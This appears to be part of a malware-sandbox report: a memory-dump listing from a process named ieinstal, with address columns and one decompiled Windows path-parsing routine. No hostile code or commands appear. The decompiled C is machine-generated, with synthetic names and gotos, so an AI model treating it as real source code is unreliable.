                                                            0x1ed25e6b
                                                            0x1ed25e7e
                                                            0x1ed25e7f
                                                            0x1ed25e7f
                                                            0x1ed25e81
                                                            0x1ed25e87
                                                            0x1ed25e8b
                                                            0x1ed25e8c
                                                            0x1ed25e8c
                                                            0x1ed25e8c
                                                            0x1ed25e9a
                                                            0x1ed25e9c
                                                            0x1ed25ea2
                                                            0x1ed25ea6
                                                            0x1ed25f50
                                                            0x1ed25f50
                                                            0x1ed25f57
                                                            0x1ed25f66
                                                            0x1ed25f66
                                                            0x1ed25f66
                                                            0x1ed25f68
                                                            0x1ed25f6a
                                                            0x1ed263d0
                                                            0x00000000
                                                            0x1ed25f70
                                                            0x1ed25f70
                                                            0x1ed25f91
                                                            0x1ed25f9c
                                                            0x1ed25f9e
                                                            0x1ed25fa4
                                                            0x1ed25fa6
                                                            0x1ed2638c
                                                            0x1ed26392
                                                            0x1ed263a1
                                                            0x1ed263a7
                                                            0x1ed263af
                                                            0x1ed263af
                                                            0x1ed263bd
                                                            0x1ed263d8
                                                            0x00000000
                                                            0x1ed263d8
                                                            0x1ed25fac
                                                            0x1ed25fb2
                                                            0x1ed25fb4
                                                            0x1ed25fbd
                                                            0x1ed25fc6
                                                            0x1ed25fce
                                                            0x1ed25fd4
                                                            0x1ed25fdc
                                                            0x1ed25fec
                                                            0x1ed25fed
                                                            0x1ed25fee
                                                            0x1ed25fef
                                                            0x1ed25ff9
                                                            0x1ed25ffa
                                                            0x1ed25ffb
                                                            0x1ed25ffc
                                                            0x1ed26000
                                                            0x1ed26004
                                                            0x1ed26012
                                                            0x1ed26012
                                                            0x1ed26018
                                                            0x1ed26019
                                                            0x1ed2601a
                                                            0x1ed2601b
                                                            0x1ed2601c
                                                            0x1ed26020
                                                            0x1ed26059
                                                            0x1ed2605c
                                                            0x1ed26061
                                                            0x1ed26061
                                                            0x1ed26022
                                                            0x1ed26022
                                                            0x1ed26022
                                                            0x1ed26025
                                                            0x1ed2602a
                                                            0x1ed2602b
                                                            0x1ed26031
                                                            0x1ed26037
                                                            0x1ed26038
                                                            0x1ed2603e
                                                            0x1ed26048
                                                            0x1ed26049
                                                            0x1ed2604a
                                                            0x1ed2604b
                                                            0x1ed2604c
                                                            0x1ed2604d
                                                            0x1ed26053
                                                            0x1ed26054
                                                            0x1ed26054
                                                            0x1ed26062
                                                            0x1ed26065
                                                            0x1ed26067
                                                            0x1ed2606a
                                                            0x1ed26070
                                                            0x1ed26075
                                                            0x1ed26076
                                                            0x1ed26081
                                                            0x1ed26087
                                                            0x1ed26095
                                                            0x1ed26099
                                                            0x1ed2609e
                                                            0x1ed260a4
                                                            0x1ed260ae
                                                            0x1ed260b0
                                                            0x1ed260b3
                                                            0x1ed260b6
                                                            0x1ed260b8
                                                            0x1ed260ba
                                                            0x1ed260ba
                                                            0x1ed260ba
                                                            0x1ed260ba
                                                            0x1ed260be
                                                            0x1ed260c0
                                                            0x1ed260c5
                                                            0x1ed260c5
                                                            0x1ed260c5
                                                            0x1ed260c6
                                                            0x1ed260cd
                                                            0x1ed26114
                                                            0x1ed260cf
                                                            0x1ed260cf
                                                            0x1ed260d4
                                                            0x1ed260d5
                                                            0x1ed260da
                                                            0x1ed260db
                                                            0x1ed260e1
                                                            0x1ed260e2
                                                            0x1ed260e8
                                                            0x1ed260f8
                                                            0x1ed260fd
                                                            0x1ed260fe
                                                            0x1ed26102
                                                            0x1ed26104
                                                            0x1ed26107
                                                            0x1ed26109
                                                            0x1ed2610b
                                                            0x1ed2610b
                                                            0x1ed2610b
                                                            0x1ed2610b
                                                            0x1ed2610f
                                                            0x1ed2610f
                                                            0x1ed26117
                                                            0x1ed2611a
                                                            0x1ed2611f
                                                            0x1ed26125
                                                            0x1ed26134
                                                            0x1ed26139
                                                            0x1ed2613f
                                                            0x1ed26146
                                                            0x1ed26148
                                                            0x1ed2614b
                                                            0x1ed2614d
                                                            0x1ed2614f
                                                            0x1ed2614f
                                                            0x1ed2614f
                                                            0x1ed2614f
                                                            0x1ed26153
                                                            0x1ed26159
                                                            0x1ed26159
                                                            0x1ed2615c
                                                            0x1ed26163
                                                            0x1ed26169
                                                            0x1ed2616c
                                                            0x1ed26172
                                                            0x1ed26181
                                                            0x1ed26186
                                                            0x1ed26187
                                                            0x1ed2618b
                                                            0x1ed26191
                                                            0x1ed26195
                                                            0x1ed261a3
                                                            0x1ed261bb
                                                            0x1ed261c0
                                                            0x1ed261c3
                                                            0x1ed261cc
                                                            0x1ed261d0
                                                            0x1ed261dc
                                                            0x1ed261de
                                                            0x1ed261e1
                                                            0x1ed261e4
                                                            0x1ed261e6
                                                            0x1ed261e8
                                                            0x1ed261e8
                                                            0x1ed261e8
                                                            0x1ed261e8
                                                            0x1ed261e6
                                                            0x1ed261ec
                                                            0x1ed261f3
                                                            0x1ed26203
                                                            0x1ed26209
                                                            0x1ed2620a
                                                            0x1ed26216
                                                            0x1ed2621d
                                                            0x1ed26227
                                                            0x1ed26241
                                                            0x1ed26246
                                                            0x1ed2624c
                                                            0x1ed26257
                                                            0x1ed26259
                                                            0x1ed2625c
                                                            0x1ed2625e
                                                            0x1ed26260
                                                            0x1ed26260
                                                            0x1ed26260
                                                            0x1ed26260
                                                            0x1ed2625e
                                                            0x1ed26264
                                                            0x1ed26267
                                                            0x1ed26269
                                                            0x1ed26315
                                                            0x1ed26315
                                                            0x1ed2631b
                                                            0x1ed2631e
                                                            0x1ed26324
                                                            0x1ed26327
                                                            0x1ed2632f
                                                            0x1ed26330
                                                            0x1ed26333
                                                            0x1ed2633a
                                                            0x1ed2633c
                                                            0x1ed26335
                                                            0x1ed26335
                                                            0x1ed26335
                                                            0x1ed2633f
                                                            0x1ed26342
                                                            0x1ed2634c
                                                            0x1ed26352
                                                            0x1ed26355
                                                            0x1ed26355
                                                            0x1ed26359
                                                            0x00000000
                                                            0x1ed2626f
                                                            0x1ed26275
                                                            0x1ed26275
                                                            0x1ed26278
                                                            0x1ed2627e
                                                            0x1ed2627e
                                                            0x1ed26281
                                                            0x1ed26287
                                                            0x1ed2628d
                                                            0x1ed26298
                                                            0x1ed2629c
                                                            0x1ed262a2
                                                            0x1ed2629e
                                                            0x1ed2629e
                                                            0x1ed2629e
                                                            0x1ed262a7
                                                            0x1ed262a7
                                                            0x1ed262aa
                                                            0x1ed262b0
                                                            0x1ed262f0
                                                            0x1ed262f0
                                                            0x1ed262f2
                                                            0x1ed262f8
                                                            0x1ed262fd
                                                            0x1ed262b2
                                                            0x1ed262b2
                                                            0x1ed262b2
                                                            0x1ed262b5
                                                            0x1ed262dd
                                                            0x1ed262e2
                                                            0x1ed262e5
                                                            0x1ed262b7
                                                            0x1ed262b8
                                                            0x1ed262bb
                                                            0x1ed262bd
                                                            0x1ed262c0
                                                            0x1ed262c4
                                                            0x1ed262cd
                                                            0x1ed262cd
                                                            0x1ed262c0
                                                            0x1ed262bb
                                                            0x1ed262b5
                                                            0x1ed26302
                                                            0x1ed26303
                                                            0x1ed26305
                                                            0x1ed26305
                                                            0x1ed26305
                                                            0x1ed2630c
                                                            0x1ed2630c
                                                            0x00000000
                                                            0x1ed2627e
                                                            0x1ed26269
                                                            0x1ed25eac
                                                            0x1ed25ebb
                                                            0x1ed25ebe
                                                            0x1ed25ecb
                                                            0x1ed25ecb
                                                            0x1ed25ece
                                                            0x1ed25ece
                                                            0x1ed25ed4
                                                            0x1ed25ed7
                                                            0x1ed25ed9
                                                            0x1ed25edb
                                                            0x1ed25edb
                                                            0x1ed25ee1
                                                            0x1ed25ee1
                                                            0x1ed25ee3
                                                            0x1ed25f20
                                                            0x1ed25f20
                                                            0x1ed25ee5
                                                            0x1ed25ee5
                                                            0x1ed25ee5
                                                            0x1ed25ee8
                                                            0x1ed25f11
                                                            0x1ed25f18
                                                            0x1ed25eea
                                                            0x1ed25eea
                                                            0x1ed25eed
                                                            0x1ed25ef2
                                                            0x1ed25ef8
                                                            0x1ed25efb
                                                            0x1ed25f0a
                                                            0x1ed25f0a
                                                            0x1ed25eed
                                                            0x1ed25ee8
                                                            0x1ed25f22
                                                            0x1ed25f28
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed25f30
                                                            0x1ed25f31
                                                            0x1ed25f37
                                                            0x1ed25f3a
                                                            0x1ed25f3d
                                                            0x1ed25f44
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed25f46
                                                            0x1ed25f48
                                                            0x1ed25f4d
                                                            0x00000000
                                                            0x1ed25f4d
                                                            0x1ed25dda
                                                            0x1ed25ddf
                                                            0x00000000
                                                            0x1ed25ddf
                                                            0x1ed25dd8
                                                            0x1ed25da7
                                                            0x1ed25da9
                                                            0x1ed25dac
                                                            0x1ed25dae
                                                            0x00000000
                                                            0x1ed25db4
                                                            0x1ed25db4
                                                            0x00000000
                                                            0x1ed25db4
                                                            0x1ed25dae
                                                            0x1ed25d88
                                                            0x1ed25d8d
                                                            0x1ed26363
                                                            0x1ed26369
                                                            0x1ed2636a
                                                            0x1ed26370
                                                            0x1ed26372
                                                            0x1ed2637a
                                                            0x1ed2637b
                                                            0x1ed2637d
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed2637f
                                                            0x1ed26385
                                                            0x00000000
                                                            0x1ed26385
                                                            0x1ed25d38
                                                            0x1ed25d3b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed25d3b
                                                            0x1ed25d27
                                                            0x1ed25d29
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed26360
                                                            0x00000000
                                                            0x1ed26360
                                                            0x1ed25c10
                                                            0x1ed25c10
                                                            0x1ed263da
                                                            0x1ed263e5
                                                            0x1ed263e5

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50fb2adb1146b17a0c291d6f3875ca11c9df929d2f472765660883e0c07dbfe5
                                                            • Instruction ID: af05206fe0ce93323d222f579749ab5a8ec66f973f12a77ee3107b9755fd9956
                                                            • Opcode Fuzzy Hash: 50fb2adb1146b17a0c291d6f3875ca11c9df929d2f472765660883e0c07dbfe5
                                                            • Instruction Fuzzy Hash: 27425C75D1026ACFDB20CF68C880BA9B7B1FF45308F5482AAD95DEB241E735A985CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC74120 Relevance: .4, Instructions: 444COMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 92%
                                                            			E1EC74120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x1ed4d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E1EC8F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E1EC76E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L1EC74620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E1EC76E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M1EC745F8))) {
												case 0:
													_v568 = 0x1ec31078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x1ec311c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L1EC74620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E1EC9F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E1EC9F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E1EC552A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E1EC6EB70(1, 0x1ed479a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E1EC6AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E1EC995D0();
																			L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E1EC9B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E1EC93D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E1EC9B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                            0x1ec74128
                                                            0x1ec74135
                                                            0x1ec7413c
                                                            0x1ec74141
                                                            0x1ec74145
                                                            0x1ec74147
                                                            0x1ec7414e
                                                            0x1ec74151
                                                            0x1ec74159
                                                            0x1ec7415c
                                                            0x1ec74160
                                                            0x1ec74164
                                                            0x1ec74168
                                                            0x1ec7416c
                                                            0x1ec7417f
                                                            0x1ec74181
                                                            0x1ec7446a
                                                            0x1ec7446a
                                                            0x1ec7418c
                                                            0x1ec74195
                                                            0x1ec74199
                                                            0x1ec74432
                                                            0x1ec74439
                                                            0x1ec7443d
                                                            0x1ec74442
                                                            0x1ec74447
                                                            0x00000000
                                                            0x1ec7419f
                                                            0x1ec741a3
                                                            0x1ec741b1
                                                            0x1ec741b9
                                                            0x1ec741bd
                                                            0x1ec745db
                                                            0x1ec745db
                                                            0x00000000
                                                            0x1ec741c3
                                                            0x1ec741c3
                                                            0x1ec741ce
                                                            0x1ec741d4
                                                            0x1ecbe138
                                                            0x1ecbe13e
                                                            0x1ecbe169
                                                            0x1ecbe16d
                                                            0x1ecbe19e
                                                            0x1ecbe16f
                                                            0x1ecbe16f
                                                            0x1ecbe175
                                                            0x1ecbe179
                                                            0x1ecbe18f
                                                            0x1ecbe193
                                                            0x00000000
                                                            0x1ecbe199
                                                            0x00000000
                                                            0x1ecbe199
                                                            0x1ecbe193
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec741da
                                                            0x1ec741da
                                                            0x1ec741df
                                                            0x1ec741e4
                                                            0x1ec741ec
                                                            0x1ec74203
                                                            0x1ec74207
                                                            0x1ecbe1fd
                                                            0x1ec74222
                                                            0x1ec74226
                                                            0x1ecbe1f3
                                                            0x1ecbe1f3
                                                            0x1ec7422c
                                                            0x1ec7422c
                                                            0x1ec74233
                                                            0x1ecbe1ed
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec74239
                                                            0x1ec74239
                                                            0x1ec74239
                                                            0x1ec74239
                                                            0x1ec74233
                                                            0x1ec74226
                                                            0x1ec741ee
                                                            0x1ec741ee
                                                            0x1ec741f4
                                                            0x1ec74575
                                                            0x1ecbe1b1
                                                            0x1ecbe1b1
                                                            0x00000000
                                                            0x1ec7457b
                                                            0x1ec7457b
                                                            0x1ec74582
                                                            0x1ecbe1ab
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec74588
                                                            0x1ec74588
                                                            0x1ec7458c
                                                            0x1ecbe1c4
                                                            0x1ecbe1c4
                                                            0x00000000
                                                            0x1ec74592
                                                            0x1ec74592
                                                            0x1ec74599
                                                            0x1ecbe1be
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec7459f
                                                            0x1ec7459f
                                                            0x1ec745a3
                                                            0x1ecbe1d7
                                                            0x1ecbe1e4
                                                            0x00000000
                                                            0x1ec745a9
                                                            0x1ec745a9
                                                            0x1ec745b0
                                                            0x1ecbe1d1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec745b6
                                                            0x1ec745b6
                                                            0x1ec745b6
                                                            0x00000000
                                                            0x1ec745b6
                                                            0x1ec745b0
                                                            0x1ec745a3
                                                            0x1ec74599
                                                            0x1ec7458c
                                                            0x1ec74582
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec741f4
                                                            0x1ec7423e
                                                            0x1ec74241
                                                            0x1ec745c0
                                                            0x1ec745c4
                                                            0x00000000
                                                            0x1ec745ca
                                                            0x1ec745ca
                                                            0x00000000
                                                            0x1ecbe207
                                                            0x1ecbe20f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec745d1
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec745ca
                                                            0x00000000
                                                            0x1ec74247
                                                            0x1ec74247
                                                            0x1ec74247
                                                            0x1ec74249
                                                            0x1ec74249
                                                            0x1ec74249
                                                            0x1ec74251
                                                            0x1ec74251
                                                            0x1ec74257
                                                            0x1ec7425f
                                                            0x1ec7426e
                                                            0x1ec74270
                                                            0x1ec7427a
                                                            0x1ecbe219
                                                            0x1ecbe219
                                                            0x1ec74280
                                                            0x1ec74282
                                                            0x1ec74456
                                                            0x1ec745ea
                                                            0x00000000
                                                            0x1ec745f0
                                                            0x1ecbe223
                                                            0x00000000
                                                            0x1ecbe223
                                                            0x1ec7445c
                                                            0x1ec7445c
                                                            0x00000000
                                                            0x1ec7445c
                                                            0x00000000
                                                            0x1ec74288
                                                            0x1ec7428c
                                                            0x1ecbe298
                                                            0x1ec74292
                                                            0x1ec74292
                                                            0x1ec7429e
                                                            0x1ec742a3
                                                            0x1ec742a7
                                                            0x1ec742ac
                                                            0x1ecbe22d
                                                            0x1ec742b2
                                                            0x1ec742b2
                                                            0x1ec742b9
                                                            0x1ec742bc
                                                            0x1ec742c2
                                                            0x1ec742ca
                                                            0x1ec742cd
                                                            0x1ec742cd
                                                            0x1ec742d4
                                                            0x1ec7433f
                                                            0x1ec7433f
                                                            0x1ec742d6
                                                            0x1ec742d6
                                                            0x1ec742d9
                                                            0x1ec742dd
                                                            0x1ec742eb
                                                            0x1ecbe23a
                                                            0x1ec742f1
                                                            0x1ec74305
                                                            0x1ec7430d
                                                            0x1ec74315
                                                            0x1ec74318
                                                            0x1ec7431f
                                                            0x1ec74322
                                                            0x1ec7432e
                                                            0x1ec7433b
                                                            0x1ec7433b
                                                            0x00000000
                                                            0x1ec7432e
                                                            0x1ec742eb
                                                            0x1ec7434c
                                                            0x1ec7434e
                                                            0x1ec74352
                                                            0x1ec74359
                                                            0x1ec7435e
                                                            0x1ec74361
                                                            0x1ec7436e
                                                            0x1ec7438a
                                                            0x1ec7438e
                                                            0x1ec74396
                                                            0x1ec7439e
                                                            0x1ec743a1
                                                            0x1ec743ad
                                                            0x1ec743bb
                                                            0x1ec743bb
                                                            0x1ec743ad
                                                            0x1ec7436e
                                                            0x1ec743bf
                                                            0x1ec743c5
                                                            0x1ec74463
                                                            0x1ec74463
                                                            0x1ec743ce
                                                            0x1ec743d5
                                                            0x1ec743d9
                                                            0x1ec743df
                                                            0x1ec74475
                                                            0x1ec74479
                                                            0x1ec74491
                                                            0x1ec74491
                                                            0x1ec74479
                                                            0x1ec743e5
                                                            0x1ec743eb
                                                            0x1ec743f4
                                                            0x1ec743f6
                                                            0x1ec743f9
                                                            0x1ec743fc
                                                            0x1ec743ff
                                                            0x1ec744e8
                                                            0x1ec744ed
                                                            0x1ec744f3
                                                            0x1ecbe247
                                                            0x00000000
                                                            0x1ec744f9
                                                            0x1ec74504
                                                            0x1ec74508
                                                            0x1ec7450f
                                                            0x1ecbe269
                                                            0x00000000
                                                            0x1ec74515
                                                            0x1ec74519
                                                            0x1ec74531
                                                            0x1ec74534
                                                            0x1ec74537
                                                            0x1ec7453e
                                                            0x1ec74541
                                                            0x1ec7454a
                                                            0x1ecbe255
                                                            0x1ecbe255
                                                            0x1ecbe25b
                                                            0x1ecbe25e
                                                            0x1ecbe261
                                                            0x1ecbe261
                                                            0x1ec74555
                                                            0x1ec74559
                                                            0x1ec7455d
                                                            0x1ecbe26d
                                                            0x1ecbe270
                                                            0x1ecbe274
                                                            0x1ecbe27a
                                                            0x1ecbe27d
                                                            0x1ecbe28e
                                                            0x1ecbe28e
                                                            0x1ec74563
                                                            0x1ec74563
                                                            0x1ec74569
                                                            0x1ec74569
                                                            0x00000000
                                                            0x1ec7455d
                                                            0x1ec7450f
                                                            0x00000000
                                                            0x1ec744f3
                                                            0x1ec743ff
                                                            0x1ec74405
                                                            0x1ec74405
                                                            0x1ec74405
                                                            0x1ec742ac
                                                            0x1ec7428c
                                                            0x1ec74282
                                                            0x1ec74407
                                                            0x1ec7440d
                                                            0x1ecbe2af
                                                            0x1ecbe2af
                                                            0x1ec74413
